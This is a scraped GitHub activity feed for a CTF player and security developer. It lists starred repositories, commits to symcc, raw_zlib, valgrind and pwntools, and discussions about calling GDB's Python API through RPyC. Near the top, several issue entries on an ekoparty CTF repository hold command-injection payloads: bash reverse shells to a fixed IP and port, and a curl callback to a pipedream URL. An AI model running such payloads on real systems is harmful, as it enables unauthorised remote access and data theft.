profile
viewpoint

mephi42/ctf 22

My solutions for CTF challenges

averliok/EquityResearch 2

MOEX stocks analysis tool

mephi42/binary-consistency-checker 2

A script to find binary inconsistencies

mephi42/ctftool 2

Opinionated automation for all the boring CTF stuff

mephi42/deluged-via-proxy 2

Run deluge via proxy in an isolated environment

mephi42/dwarfexport 2

Export dwarf debug information from IDA Pro

mephi42/angr 1

A powerful and user-friendly binary analysis platform!

mephi42/angr-dev 1

Some helper scripts to set up an environment for angr development.

mephi42/angr-doc 1

Documentation for the angr suite

mephi42/ant-ivy 1

Mirror of Apache Ant Ivy

startedintel/SGXDataCenterAttestationPrimitives

started time in 18 minutes

startedandr3colonel/ghidra_wasm

started time in 2 days

startedzxing/zxing

started time in 2 days

issue openedekoparty2020/ekolabs

very important

";bash -c 'bash -i >& /dev/tcp/178.217.31.157/14880 0>&1';"

created time in 2 days

issue openedekoparty2020/ekolabs

very important test

";bash -i >& /dev/tcp/178.217.31.157/14880 0>&1;"

created time in 2 days

issue openedekoparty2020/ekolabs

test

";bash -i >& /dev/tcp/178.217.31.157/14880 0>&1;"

created time in 2 days

issue openedekoparty2020/ekolabs

xxx

";curl https://efc9066fd6dd763082adbfa4aa51c790.m.pipedream.net;

created time in 2 days

startedcmu-sei/pharos

started time in 3 days

startedleesh3288/CTF

started time in 3 days

startedWebAssembly/wabt

started time in 9 days

startedbelambert/asr-evaluation

started time in 13 days

startedgoogle/google-ctf

started time in 15 days

pull request commenteurecom-s3/symcc

Make tests endianness-agnostic

I'm trying to use it on IBM Z (aka s390). AFL's LLVM mode already works there, so after your FuzzCon presentation I thought I could try improving the fuzzing results with symcc. The first step was to build it and try the test suite - there is by the way a small linker problem with missing set_curterm and other libtinfo symbols when linking with libSymRuntime, which I solved in my setup by just adding -ltinfo to symcc.in - but I'm not sure whether this is the right solution. I haven't finished doing all the stuff described in Fuzzing.txt yet, but plan to do so in the near future.

Thanks for the fixes - I haven't realized that _sym_get_parameter_expression() returns nullptr for concrete values (now I see that its return value comes from getSymbolicExpressionOrNull()).

mephi42

comment created time in 15 days

PR opened eurecom-s3/symcc

Make tests endianness-agnostic

Currently tests take binary input in little-endian format and thus fail on big-endian systems.

Fix by converting inputs to network byte order, using ntohl() in tests and providing the symbolic ntohl() wrapper. Other functions from this family could be similarly added as well, but it is not required for this fix.

+97 -27

0 comment

21 changed files

pr created time in 16 days

push eventmephi42/symcc

mephi42

commit sha afbcd51dea17590fe5a19457de77a8d1cf26d5ca

Make tests endianness-agnostic Currently tests take binary input in little-endian format and thus fail on big-endian systems. Fix by converting inputs to network byte order, using ntohl() in tests and providing the symbolic ntohl() wrapper. Other functions from this family could be similarly added as well, but it is not required for this fix.

view details

push time in 16 days

fork mephi42/symcc

SymCC: efficient compiler-based symbolic execution

http://www.s3.eurecom.fr/tools/symbolic_execution/symcc.html

fork in 16 days

startedtrailofbits/deepstate

started time in 18 days

startedcarolemieux/afl-rb

started time in 18 days

startedcarolemieux/perffuzz

started time in 18 days

startedsslab-gatech/qsym

started time in 18 days

startedRUB-SysSec/ijon

started time in 18 days

startednyx-fuzz/libxdc

started time in 18 days

starteduds-se/FormatFuzzer

started time in 18 days

startedgoogle/honggfuzz

started time in 18 days

push eventmephi42/ctf

mephi42

commit sha 3b20158e0f940ee91a6bab0e6d4cccb13879e1d7

Add 2020.09.04-ALLES!_CTF_2020 maze

view details

push time in 20 days

startedgoogleprojectzero/winafl

started time in 23 days

startedzaproxy/zaproxy

started time in a month

startedGoogleCloudPlatform/flask-talisman

started time in a month

startedpyupio/safety-db

started time in a month

starteddropbox/zxcvbn

started time in a month

push eventmephi42/ctf

mephi42

commit sha 59b77a0b909520d0fc5c4384f7815953cf215879

Add solutions from a bunch of past CTFs (no writeups)

view details

push time in a month

starteduw-unsat/jitterbug

started time in a month

starteda13xp0p0v/kconfig-hardened-check

started time in a month

starteda13xp0p0v/linux-kernel-defence-map

started time in a month

startedresilar/crchack

started time in a month

startedtwosigma/fastfreeze

started time in a month

startedkinvolk/traceloop

started time in a month

push eventmephi42/raw_zlib

mephi42

commit sha b540b554ffcf991cddf50d01739971be97a1d5fc

Fix ResourceWarning in test_inflate_deflate

view details

push time in a month

startedRUB-SysSec/redqueen

started time in a month

startedkach/tower-of-power

started time in a month

startedusnistgov/SCTK

started time in a month

push eventmephi42/raw_zlib

mephi42

commit sha 64575f3990c3fe80aad11c6a703e2c74352d556e

Do not check CINFO in test_deflate_reset

view details

push time in a month

push eventmephi42/raw_zlib

mephi42

commit sha 098cf1dbe48267d840748f9a62fa1227ee99eb07

Fix running installed test_inflate_deflate

view details

push time in a month

create barnchmephi42/raw_zlib_benchmarks

branch : master

created branch time in a month

push eventmephi42/raw_zlib

mephi42

commit sha 97247d56fc4e1639fcb7e36e616886990b336c02

Remove benchmark

view details

mephi42

commit sha 726886f7a8686d468641eb6dbc09fa005dd7c02d

Fix 'classifiers' should be a list, got type 'tuple'

view details

push time in a month

created repositorymephi42/raw_zlib_benchmarks

created time in a month

startedminimaxir/big-list-of-naughty-strings

started time in a month

push eventmephi42/raw_zlib

mephi42

commit sha 137148552075f637fd876f162b0c3217a818df20

Ship tests with raw_zlib

view details

push time in a month

push eventmephi42/raw_zlib

mephi42

commit sha a59f0ad64daf4a009e304142ba2a08999f432346

Test different buffer size combinations

view details

push time in a month

push eventmephi42/raw_zlib

mephi42

commit sha 0b31d62b8015be5c361e5aa68f6c426060d52222

Add quick and dirty performance tests

view details

push time in a month

push eventmephi42/raw_zlib

mephi42

commit sha 15b77ad06ec0058c76cfcc7d66213e4b2610b2bf

Add three tests for different deflate sequences

view details

push time in a month

push eventmephi42/raw_zlib

mephi42

commit sha eb9c84344d92fcfbb43bcca48847254bba83e9a2

Add test_deflate_params5

view details

push time in a month

startedaxboe/fio

started time in 2 months

push eventmephi42/raw_zlib

mephi42

commit sha 1c908a1a3641fd70a5ee2aaa33c4846576f9d9b7

Add --window-bits parameter to deflate.py and inflate.py

view details

push time in 2 months

push eventmephi42/raw_zlib

mephi42

commit sha f22746ff409bd20644e4fd7bf4a03b987981863b

Add test_deflate_params4

view details

push time in 2 months

push eventmephi42/raw_zlib

mephi42

commit sha 034d53fb891275e3b70022e79cb6d27eefba33c3

Add test_deflate_params3

view details

push time in 2 months

push eventmephi42/raw_zlib

mephi42

commit sha f9874375ed5a5ed904fb9f9305b72f474b2cb680

Add test_deflate_params2

view details

push time in 2 months

push eventmephi42/linetrace-cmd-record

mephi42

commit sha d40504dfac1e784963e41a4015c7d09df6bcdd33

Add BTF example

view details

push time in 2 months

push eventmephi42/linetrace-cmd-record

mephi42

commit sha 3e4964063f404cbe6c8ae95fbea9174a7c87930c

Update Fedora install instructions

view details

push time in 2 months

push eventmephi42/linetrace-cmd-record

mephi42

commit sha af808a8cd685ec86b691224a97ea83be13bfa348

Add Ubuntu support

view details

push time in 2 months

push eventmephi42/raw_zlib

mephi42

commit sha f57b6c2aeae2e86f16ba4d6d724aa8f1bfbbda4a

Add test_set_dictionary4

view details

push time in 2 months

push eventmephi42/raw_zlib

mephi42

commit sha 2fb88b4a0c85198170ea2090e563976c4a59c755

Add test_set_dictionary3

view details

push time in 2 months

push eventmephi42/raw_zlib

mephi42

commit sha 56c8ecfad7ec81e14da6b0ba8e7569ad4a2be501

Add test for deflateSetDictionary() + Z_NO_COMPRESSION

view details

push time in 2 months

push eventmephi42/raw_zlib

mephi42

commit sha e8af0a6ba5ffab2e924138b2168693d5b96c1227

Add test_small_out3

view details

push time in 2 months

push eventmephi42/raw_zlib

mephi42

commit sha 2edd282149d60fa1e4aaa528b38b1242d9ec20d2

Add another test for small output buffer handling

view details

push time in 2 months

push eventmephi42/raw_zlib

mephi42

commit sha f54b3d43e49c613c6195b1628e2c1cc2512658a5

Test small output buffer handling

view details

push time in 2 months

push eventmephi42/raw_zlib

Ilya Leoshkevich

commit sha ce5eeaf4a1ab1df63eb099d743ab7de63fa47220

Test small output buffer handling

view details

push time in 2 months

push eventmephi42/memtrace

mephi42

commit sha ec2a8ccd2b225cbce5460bfc9b5c08a50e27ca00

Allow running ci script for multiple architectures

view details

push time in 2 months

push eventmephi42/memtrace

Andreas Arnez

commit sha abe7f083fdebb40c6f4a5adbdd2b64f5c329969a

Bug 418997 - s390x: Support Iex_ITE for float and vector expressions The s390x backend supports Iex_ITE expressions for integer types I8, I16, I32, and I64 only. But "grail" can now generate such expressions for guarding any kind of Ist_Put statements; see add_guarded_stmt_to_end_of() in "guest_generic_bb_to_IR.c". On s390x this means that F64 and V128 can occur as well, in which case a crash would result. And such crashes are actually seen when running the test suite with "grail" enabled. Extend Iex_ITE support to the floating-point types F32 and F64 and to the vector type V128. Do this by extending S390_INSN_COND_MOVE as needed.

view details

Andreas Arnez

commit sha dd627dc127a6767c497f027de6eab634815f7861

s390x: Activate "grail" Now that the known problems with activating "grail" on s390x have been fixed, there is no need to disable it for s390x guests any more. Remove the appropriate check in "guest_generic_bb_to_IR.c".

view details

Andreas Arnez

commit sha e00bd722becf198447a4f7293c3d54e2d7f9baa2

s390x: Drop register arg to s390_isel_int1_expr() Restructure the interface of s390_isel_int1_expr() such that no destination register is passed to it any more. Adjust all its callers accordingly. Ensure that callers never modify the returned register, but make a copy and modify that instead.

view details

Andreas Arnez

commit sha 1008ab726d43efd7e68225a56cc823a18eca8780

s390x: Fix typos in comments for sub_from_SP and add_to_SP in isel The comments for sub_from_SP() and add_to_SP() in host_s390_isel.c have typos. Fix them.

view details

Andreas Arnez

commit sha 4e9763c617757712747e076b5d03bbb60a91c729

s390x: Introduce and exploit new ALU operator S390_ALU_ILIH The handlers of Iop_8HLto16, Iop16HLto32, and Iop_32HLto64 in s390_isel_int_wrk() yield a sequence of "shift", "and", and "or" ALU operations, the second of which modifies a register returned from a call to s390_isel_int_expr(). While this approach does not lead to wrong code generation (because only the register's upper bits are changed which are not relevant to the IR type), it violates the general "no-modify" rule. Replace this sequence of ALU operations by a single ALU operation S390_ALU_ILIH that inserts the low half of its second operand into the high half of its first operand. Use the z/Architecture instruction RISBG ("rotate then insert selected bits") for implementating it.

view details

Andreas Arnez

commit sha 4970e20020cb80aa6b8ee80d53cefc409790547b

s390x: Fix Iex_Load instruction selectors for F128/D128 types The s390x instruction selectors for Iex_Load of Ity_F128 and Ity_D128 types had a common typo that would lead to crashes when used. So far this bug didn't surface because Iex_Load is not emitted on s390x with these types. This fixes the typo.

view details

Andreas Arnez

commit sha 6a90a15b9c0cbf38b6a9f17e5fa28199e155de73

s390x: Drop spurious register moves in CDAS instruction selector The s390x instruction selector for Ist_CAS, in its handling of "compare double and swap", adds spurious register moves after the CDAS operation itself. These moves overwrite registers returned by calls to s390_isel_int_expr(), potentially causing corruption of temp values. Delete the spurious move operations after CDAS.

view details

Philippe Waroquiers

commit sha 2381e043544b1e9e9c72e272b9e9244a43682357

Fix solaris build Problem report and fix by Paul Floyd

view details

Bart Van Assche

commit sha 20dc7278512cbe530dc722ed18232915bfe4ab8b

drd/tests/trylock, FreeBSD: Fix a hang The test code in drd/tests/trylock.c attempts to write-lock a POSIX rwlock twice. The code expects the second attempt to return an error, but POSIX doesn't require that behaviour, and FreeBSD's implementation deadlocks instead. See also https://bugs.kde.org/show_bug.cgi?id=403212 Reported-by: Mark Johnston <markj@FreeBSD.org>

view details

Bart Van Assche

commit sha 52d02fe239117c76bdc0fe4b12e85b9156dc4269

drd/drd_pthread_intercepts: Add a workaround for what is probably a compiler bug Without this patch drd produces incorrect output for some test cases. It seems like without this patch an incorrect value is passed as the sixth argument of VALGRIND_DO_CLIENT_REQUEST_STMT(VG_USERREQ__POST_SEM_OPEN, ...): $ ./vg-in-place --tool=drd --traemaphore=yes drd/tests/sem_open -m -p drd, a thread error detector Copyright (C) 2006-2017, and GNU GPL'd, by Bart Van Assche. Using Valgrind-3.16.0.GIT and LibVEX; rerun with -h for copyright info Command: drd/tests/sem_open -m -p [1] sem_open 0x4029000 name /drd-sem-open-test-27725 oflag 0xc0 mode 0600 value 0 s_d1 = 1 (should be 1) [2] sem_wait 0x4029000 value 0 -> 4294967295 Thread 2: Invalid semaphore: semaphore 0x4029000 at 0x484ADC7: sem_wait_intercept (drd_pthread_intercepts.c:1436) by 0x484ADC7: sem_wait@* (drd_pthread_intercepts.c:1441) by 0x4014A9: thread_func (sem_open.c:114) by 0x483FEA6: vgDrd_thread_wrapper (drd_pthread_intercepts.c:449) by 0x4886EF9: start_thread (in /lib64/libpthread-2.31.so) by 0x499F3BE: clone (in /lib64/libc-2.31.so) semaphore 0x4029000 was first observed at: at 0x484A395: sem_open_intercept (drd_pthread_intercepts.c:1403) by 0x484A395: sem_open (drd_pthread_intercepts.c:1409) by 0x4012CE: main (sem_open.c:63) [2] sem_post 0x4029000 value 4294967295 -> 0 [1] sem_wait 0x4029000 value 0 -> 4294967295 Thread 1: Invalid semaphore: semaphore 0x4029000 at 0x484ADC7: sem_wait_intercept (drd_pthread_intercepts.c:1436) by 0x484ADC7: sem_wait@* (drd_pthread_intercepts.c:1441) by 0x40139D: main (sem_open.c:90) semaphore 0x4029000 was first observed at: at 0x484A395: sem_open_intercept (drd_pthread_intercepts.c:1403) by 0x484A395: sem_open (drd_pthread_intercepts.c:1409) by 0x4012CE: main (sem_open.c:63) Conflicting load by thread 1 at 0x00404108 size 8 at 0x40139E: main (sem_open.c:91) Allocation context: BSS section of /home/bart/software/valgrind.git/drd/tests/sem_open Other segment start (thread 2) (thread finished, call stack no longer available) Other segment end (thread 2) (thread finished, call stack no longer available) Conflicting store by thread 1 at 0x00404108 size 8 at 0x4013B2: main (sem_open.c:91) Allocation context: BSS section of /home/bart/software/valgrind.git/drd/tests/sem_open Other segment start (thread 2) (thread finished, call stack no longer available) Other segment end (thread 2) (thread finished, call stack no longer available) [1] sem_post 0x4029000 value 4294967295 -> 0 s_d2 = 2 (should be 2) s_d3 = 5 (should be 5) [1] sem_close 0x4029000 value 0 For lists of detected and suppressed errors, rerun with: -s ERROR SUMMARY: 4 errors from 4 contexts (suppressed: 18 from 8)

view details

Julian Seward

commit sha ecf5636a1442c024a9b30debcbec8c2013ec5af7

Add a missing \n in debug output printing.

view details

Mark Wielaard

commit sha bc7eb9046f93558903fc388a00dbb60c89a9cf73

Add missing vki header files to nobase_pkginclude_HEADERS. Otherwise they don't show up in the dist tarball.

view details

Julian Seward

commit sha afe1d87762a4c1500ceb6d38075d2c6db1cd4482

Update bug status.

view details

Mark Wielaard

commit sha ad0ca50fc9fa5c65dca9f0aa14e3955644b876bd

Add avx_tests.h to noinst_HEADERS to make sure it appears in dist.

view details

Julian Seward

commit sha 40187fcd61ee877f78701c46a74ac1dadbe65b3d

Remove the exp-sgcheck tool. It only ever worked on x86 and amd64, and even on those it had a high false positive rate and was slow. Everything it does, ASan can do faster, better, and on more architectures. So there's no reason to keep this tool any more.

view details

Stefan Maksimovic

commit sha ddc311558e11c47a06ba996a7d075b336726fc0b

mips: treat delay slot as part of the previous instruction Do so by recursively calling disInstr_MIPS_WRK() if the instruction currently being disassembled is a branch/jump, effectively combining them into one IR instruction. A notable change is that the branch/jump + delay slot combination now forms an eight-byte instruction. This is related to KDE #417187. This fixes drd/tests/annotate_hbefore on mips.

view details

Petar Jovanovic

commit sha 8bd259eb14d884009e2e51e6ad5834c06d193e17

mips: update VEX to support speculative conditional branching This partially fixes KDE #417187.

view details

Stefan Maksimovic

commit sha fd97444eb2a82e13923a48b0b6951e3530d02c74

mips: add a special case for beq r0, r0, imm This results in unconditional PUTs to PC in generated IR code. This fixes: memcheck/tests/cdebug_zlib memcheck/tests/cdebug_zlib_gnu memcheck/tests/origin2-not-quite memcheck/tests/origin5-bz2 none/tests/mips64/branch_and_jump_instructions

view details

Petar Jovanovic

commit sha feccc40da7a5d9ec29d23d819dbdf17ad793ac3d

update NEWS with fix for #417187 The KDE issue #417187 has been fixed in commit 8bd259eb14d884009e2e51e6ad5834c06d193e17 mips: update VEX to support speculative conditional branching commit ddc311558e11c47a06ba996a7d075b336726fc0b mips: treat delay slot as part of the previous instruction

view details

Aleksandar Rikalo

commit sha 93bb2da218a691532cd709b195b687e02ac0f1d2

Fix memcheck/vbit-test for BE platforms We do not need u1 member of bits union as long as we use u32 for the same purpose. Overlapping uint8_t with uint32_t causes a problem on BE platforms, since LSB of u32 is not overlap with u1.

view details

push time in 2 months

push eventmephi42/pwntools

heapcrash

commit sha cc6d272760c115baa4700d727a52dcea170bb65f

[release] Version bump to 4.1.7

view details

Kyle Zeng

commit sha 230a42ffc0b63148b82b5c6c270d211f8ad83507

OSError is not subscriptable (#1608)

view details

heapcrash

commit sha bae22da550fb664be4989aff01b9f81323dbfcda

Merge branch 'stable' into beta

view details

heapcrash

commit sha 1cc5deca5095f72d0de1d640558017adf8a167e9

[gha] Add doctest to verify that skipif works

view details

heapcrash

commit sha 3390eafab33c6e2f8c0df1ead412201c777d4da2

[doctest] Try testsetup / failing doctest

view details

heapcrash

commit sha 21215ac22f17f214abb9d253fc6b707d9f3424c6

[gha] Remove canary test for skipif section

view details

heapcrash

commit sha 7647ea6ca9160f528506fa2fa0d3d13ae6343dfc

[ci] Remove failing testsetup block

view details

heapcrash

commit sha 13960bac0894701e41bf04047359bce65efe3d4d

Merge branch 'beta' into dev

view details

heapcrash

commit sha 2e61a6be7f7aaba5d240f545864bc912449adff8

[release] 4.2.0 is now "stable"

view details

heapcrash

commit sha 7b130aec79176aaa952cae1ca18934375c99a919

[4.3.0] dev is now beta

view details

heapcrash

commit sha 89e3f2bee0e5ab4a44af294f064824e99b4afef6

[dev] Version bump for dev

view details

heapcrash

commit sha db7312b43fa419a1be9c943b409873c0fc4a137c

Merge branch 'stable' into beta

view details

heapcrash

commit sha 6afccefb0108bc07adec368925adc78c263ea430

Merge branch 'beta' into dev

view details

heapcrash

commit sha 0337387f97d2ce0533660673d17d763c5672dce5

Add Python3 to supported languages for PyPi

view details

heapcrash

commit sha db0312e0fe94d2b62b6a918569c86b68a2dfa991

Merge branch 'stable' into beta-staging

view details

heapcrash

commit sha 427066d9370b7fc735a7b82110ec5bc55ebfc77a

[memleak] Fix missing import

view details

Heap Crash

commit sha 08d900994d7aa352e250357c116d9502a2491fa9

[changelog] Update changelog for new release (#1626)

view details

heapcrash

commit sha 2fafbfb29175faeff1d69a3660e1f1245e37cd74

Merge branch 'beta-staging' into dev

view details

heapcrash

commit sha d2b0a5913bfdf830efe119bd0697b068dd7d837d

[changelog] Update release date and version list

view details

Jakub Kądziołka

commit sha ca06098649b5186416864255d2b2c896093b55e8

Fix documentation formatting for pwnlib.util.packing.flat (#1624)

view details

push time in 2 months

create barnchmephi42/pwntools

branch : gdb-api

created branch time in 2 months

startedmarcan/takeover.sh

started time in 2 months

startedg2p/blocks

started time in 2 months

startedgoogle/libprotobuf-mutator

started time in 2 months

push eventmephi42/raw_zlib

mephi42

commit sha 0df3a7606f6cb13af566d088bdede01880caed5c

Fix compressed data length in test_inflate_prime

view details

push time in 2 months

startedyarrick/pingfs

started time in 2 months

issue commentGallopsled/pwntools

Allow calling GDB Python API

I made a small working prototype with RPyC. The advantage of RPyC is that everything is transparent - pwntools users would interact with GDB API directly without us having to wrap or register each individual call. Unfortunately, RPyC developers said that inheriting from remote classes is a hard problem, therefore there would have to be some special magic for Breakpoint class.

Regarding threading, yes, the code has to be liberally sprinkled with gdb.post_event(). I'm experimenting with making RPyC network code run in a separate thread while dispatching remote calls to GDB thread.

mephi42

comment created time in 2 months

startedakaihola/pgtricks

started time in 3 months

issue commenttomerfiliba/rpyc

Inheriting from remote classes

Thanks for looking into this! Could you please also try inheriting from parent_gdb_conn.root.get_gdb().Breakpoint? That's where I'm having most issues.

mephi42

comment created time in 3 months

issue openedtomerfiliba/rpyc

Inheriting from remote classes

Hi,

I'm trying to use RPyC in order to call GDB Python API. Exposing gdb module and calling methods like execute() on it has been fairly straightforward - which is pretty cool! Now I'm trying to implement breakpoints, and they require subclassing gdb.Breakpoint. Something like this:

    cat.gdb = unix_connect(...).root.get_gdb()
    class WriteBp(cat.gdb.Breakpoint):
        def on_stop(self):
            cat.gdb.execute('c')

fails immediately with

  File "gdb_api.py", line 10, in main
    class WriteBp(cat.gdb.Breakpoint):
  File "venv/site-packages/rpyc/core/netref.py", line 274, in method
    return syncreq(_self, consts.HANDLE_CALLATTR, name, args, kwargs)
  File "venv/site-packages/rpyc/core/netref.py", line 75, in syncreq
    conn = object.__getattribute__(proxy, "____conn__")
AttributeError: 'str' object has no attribute '____conn__'

when trying to call __prepare__ method. So I figured that _make_method must be missing a bunch of stuff required to implement metaclasses. I wonder how doable is this in the end? I could take a stab at this, but I thought I'd better ask first - maybe you already work on this, or maybe you already considered it and decided it wasn't possible :-)

created time in 3 months

issue commentGallopsled/pwntools

Allow calling GDB Python API

What prompted me to think about this was solving CTF heap challenges, where I have to constantly go back and forth between exploit, gdbscript trace output and gdb itself, making sure that modifications to exploit produce desired results and don't break anything.

What's especially frustrating is realizing at some point that you need to modify the very beginning of the exploitation chain, and then figure out what other parts need to be adjusted. To keep track of all that I normally write comments like "here heap should be in XYZ state" and, when needed, compare them with what I see in gdb, but having the ability to automatically check all that would be invaluable.

The simplest use case therefore would be:

io.sendline('command')
io.recvuntil('prompt')
chunks1 = parse_chunks(io.gdb.execute('heap chunks'))  # GEF integration for structured output might be cool too
assert chunks1.fastbins(0x20)[0] & 0xfff == 0xa20

Catching victim processing in simple cases might look like this:

class MallocBp(io.gdb.Breakpoint):
    def __init__(self):
        super().__init__(self, "malloc")
        self.count = 0

    def stop(self):
        self.count += 1
        if self.count == 5:
            io.gdb.execute('finish')
            assert int(io.gdb.parse_and_eval('$rax')) == free_hook_addr

io.recvuntil('prompt')
bp = MallocBp()
io.sendline('command')
io.recvuntil('prompt')
assert bp.count == 20
bp.delete()
mephi42

comment created time in 3 months

issue openedGallopsled/pwntools

Allow calling GDB Python API

It would be great if pwntools could allow using GDB's Python API like this:

io = gdb.debug(['./pwnme'])
...
class Bp(io.gdb.Breakpoint):
    def stop(self):
        print(io.gdb.inferiors()[0].read_memory(addr, 8))
        io.gdb.execute('c')

This would make it possible to write assertions against program state, e.g. compare leaked variables with their actual values, check that heap massaging produces desired layout, or ensure that sending a certain input at a certain time triggers a certain function with certain arguments, etc.

A possible implementation might be injecting RPyC server into gdb via gdbscript and using gdb.post_event to talk to the main loop. RPyC claims to support callbacks so triggering breakpoint processing on pwntools side should be possible.

If this looks like a valuable feature, I could at least implement a PoC. Please let me know what you think!

created time in 3 months

startedBoolector/boolector

started time in 3 months

startedEasyHook/EasyHook

started time in 3 months

startedMaktm/FLIRTDB

started time in 3 months

push eventmephi42/schick

mephi42

commit sha 1db659556a406daced3ab20e2f3575a937bdbde6

Stop after reaching --max-active states

view details

push time in 3 months

push eventmephi42/schick

mephi42

commit sha f2f82f5c20ffaec2cd92205da93cd23532347379

Handle if statements

view details

push time in 3 months

push eventmephi42/schick

mephi42

commit sha d54e58cae3852a25a36852e432e701a2421f3ddd

Handle if statements

view details

push time in 3 months

push eventmephi42/schick

mephi42

commit sha fd018c926fe4af45db94c5a997deb35157321493

Handle if statements

view details

push time in 3 months

push eventmephi42/schick

mephi42

commit sha 0c73331d19910aaa481b087c4c6978f786e59a62

Replace Cfg with stStack

view details

push time in 3 months

push eventmephi42/schick

mephi42

commit sha d6f0bb0e2611cd5bbb5901ee154ccf29291cd02d

Handle if statements

view details

push time in 3 months

push eventmephi42/schick

mephi42

commit sha 9bce054e062ae7b02a03106460fbc872e6dbe4d2

Handle case statements

view details

push time in 3 months

more